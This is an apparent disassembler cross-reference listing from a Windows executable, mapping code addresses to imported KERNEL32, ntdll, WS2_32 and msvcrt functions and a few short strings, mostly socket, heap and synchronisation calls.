0x40b435	0x40d100	import	0x40b310	KERNEL32.dll.LeaveCriticalSection
0x40b453	0x40d10c	import	0x40b310	KERNEL32.dll.EnterCriticalSection
0x40b465	0x40d29c	import	0x40b310	ntdll.dll.NtQuerySystemTime
0x40b475	0x40d290	import	0x40b310	ntdll.dll.RtlTimeToSecondsSince1980
0x40b485	0x40d040	import	0x40b310	KERNEL32.dll.InterlockedExchangeAdd
0x40b4a0	0x40d23c	import	0x40b310	WS2_32.dll.shutdown
0x40b4a7	0x40d244	import	0x40b310	WS2_32.dll.closesocket
0x40b4c5	0x40d100	import	0x40b310	KERNEL32.dll.LeaveCriticalSection
0x40b4cb	0x40d0cc	import	0x40b310	KERNEL32.dll.GetTickCount
0x40b4db	0x40d04c	import	0x40b310	KERNEL32.dll.WaitForSingleObject
0x40b501	0x40d218	import	0x40b500	WS2_32.dll.WSASend
0x40b532	0x40d21c	import	0x40b500	WS2_32.dll.WSAGetLastError
0x40b548	0x40d0d4	import	0x40b500	KERNEL32.dll.Sleep
0x40b5ba	0x40d054	import	0x40b580	KERNEL32.dll.GetCurrentProcessId
0x40b5e3	0x40d064	import	0x40b580	KERNEL32.dll.HeapCreate
0x40b5f0	0x40b616	string	0x40b580	jLj\bP
0x40b604	0x40d058	import	0x40b580	KERNEL32.dll.HeapSetInformation
0x40b61b	0x40d06c	import	0x40b580	KERNEL32.dll.HeapAlloc
0x40b6a3	0x40d10c	import	0x40b580	KERNEL32.dll.EnterCriticalSection
0x40b6c6	0x40d100	import	0x40b580	KERNEL32.dll.LeaveCriticalSection
0x40b6dd	0x40d068	import	0x40b580	KERNEL32.dll.HeapFree
0x40b715	0x40d054	import	0x40b580	KERNEL32.dll.GetCurrentProcessId
0x40b76a	0x40d214	import	0x40b760	WS2_32.dll.WSARecv
0x40b7a0	0x40d21c	import	0x40b760	WS2_32.dll.WSAGetLastError
0x40b7b6	0x40d0d4	import	0x40b760	KERNEL32.dll.Sleep
0x40b81d	0x40d040	import	0x40b800	KERNEL32.dll.InterlockedExchangeAdd
0x40b84b	0x40d044	import	0x40b800	KERNEL32.dll.InterlockedIncrement
0x40b85d	0x40d050	import	0x40b800	KERNEL32.dll.InterlockedDecrement
0x40b891	0x40d29c	import	0x40b870	ntdll.dll.NtQuerySystemTime
0x40b8a1	0x40d290	import	0x40b870	ntdll.dll.RtlTimeToSecondsSince1980
0x40b8b0	0x40d048	import	0x40b870	KERNEL32.dll.InterlockedExchange
0x40b8da	0x40d050	import	0x40b870	KERNEL32.dll.InterlockedDecrement
0x40b8ed	0x40d050	import	0x40b870	KERNEL32.dll.InterlockedDecrement
0x40b8fe	0x40d040	import	0x40b870	KERNEL32.dll.InterlockedExchangeAdd
0x40b985	0x40d050	import	0x40b870	KERNEL32.dll.InterlockedDecrement
0x40b9b5	0x40d050	import	0x40b870	KERNEL32.dll.InterlockedDecrement
0x40ba20	0x40d050	import	0x40b870	KERNEL32.dll.InterlockedDecrement
0x40ba56	0x40d1f4	import	0x40b870	WS2_32.dll.setsockopt
0x40ba63	0x40d244	import	0x40b870	WS2_32.dll.closesocket
0x40bb56	0x40d054	import	0x40bb50	KERNEL32.dll.GetCurrentProcessId
0x40bb71	0x40d06c	import	0x40bb50	KERNEL32.dll.HeapAlloc
0x40bbab	0x40d08c	import	0x40bb50	KERNEL32.dll.GetSystemInfo
0x40bbb5	0x40d0fc	import	0x40bb50	KERNEL32.dll.InitializeCriticalSection
0x40bbcf	0x40d084	import	0x40bb50	KERNEL32.dll.CreateEventA
0x40bbe8	0x40d098	import	0x40bb50	KERNEL32.dll.CreateIoCompletionPort
0x40bc1c	0x40d064	import	0x40bb50	KERNEL32.dll.HeapCreate
0x40bc29	0x40bc4f	string	0x40bb50	j0j\bP3
0x40bc3d	0x40d058	import	0x40bb50	KERNEL32.dll.HeapSetInformation
0x40bc91	0x40d24c	import	0x40bb50	WS2_32.dll.WSASocketA
0x40bcb7	0x40d1f4	import	0x40bb50	WS2_32.dll.setsockopt
0x40bce3	0x40d234	import	0x40bb50	WS2_32.dll.htons
0x40bcf9	0x40d1fc	import	0x40bb50	WS2_32.dll.bind
0x40bd0d	0x40d250	import	0x40bb50	WS2_32.dll.listen
0x40bd18	0x40d268	import	0x40bb50	WS2_32.dll.WSACreateEvent
0x40bd2c	0x40d260	import	0x40bb50	WS2_32.dll.WSAEventSelect
0x40bd82	0x40d278	import	0x40bd82	msvcrt.dll._vscprintf
0x40be49	0x40be6e	string	0x40bd90	]_^[
0x40be57	0x40be6e	string	0x40bd90	]_^[
0x40be92	0x40d280	import	0x40be92	ntdll.dll.memset
0x40be98	0x40d284	import	0x40be98	ntdll.dll.memcpy
0x40be9e	0x40d288	import	0x40be9e	ntdll.dll._chkstk
0x40beaf	0x40bebc	string	0x40bea4	]_^[
0x40bff8	0x40c002	string	0x40bfb9	3҉U\b blocks=Basic Latin,Cyrillic
0x40c193	0x40c189	string	0x40bfb9	90t\bJ
0x40c1dc	0x40d28c	import	0x40c1dc	ntdll.dll.RtlUnwind
0x40c1e2	0x40d298	import	0x40c1e2	ntdll.dll.NtQueryVirtualMemory
